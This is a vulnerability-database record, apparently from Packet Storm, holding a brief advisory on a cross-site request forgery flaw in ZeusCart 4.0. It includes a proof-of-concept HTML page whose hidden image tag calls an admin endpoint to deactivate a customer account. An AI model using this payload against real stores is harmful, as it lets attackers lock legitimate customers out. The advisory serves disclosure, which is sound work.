{"id": "PACKETSTORM:150883", "type": "packetstorm", "bulletinFamily": "exploit", "title": "ZeusCart 4.0 Cross Site Request Forgery", "description": "", "published": "2018-12-22T00:00:00", "modified": "2018-12-22T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/150883/ZeusCart-4.0-Cross-Site-Request-Forgery.html", "reporter": "mqt", "references": [], "cvelist": [], "lastseen": "2018-12-25T18:50:53", "viewCount": 9, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.6}, "sourceHref": "https://packetstormsecurity.com/files/download/150883/zeuscart40-xsrf.txt", "sourceData": "`# Exploit Title: ZeusCart4.0 Deactivate Customer Accounts CSRF \n# Date: 12/20/2018 \n# Exploit Author: mqt \n# Vendor Homepage: http://http://www.zeuscart.com/ \n# Version: Zeus Cart 4.0 CSRF \n \n1. Vulnerability Description \n \nDue to the form not being validated, ZeusCart4.0 suffers from a Cross \nSite Request Forgery vulnerability, which means an attacker can \nperform actions on behalf of a victim, by having the victim visit an \nattacker controlled site. \n \nIn this case, the attacker is able to \"deactivate\" any customer \naccounts, which means that the account is banned and cannot login. \n \nProof of Concept: \n<html> \n<body> \n<img style=\"display:none\"msrc=\"http://localhost/admin/?do=regstatus&action=deny&id=2\" alt=\"\"> \n</body> \n</html> \n \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645636768}}
ZeusCart 4.0 Cross Site Request Forgery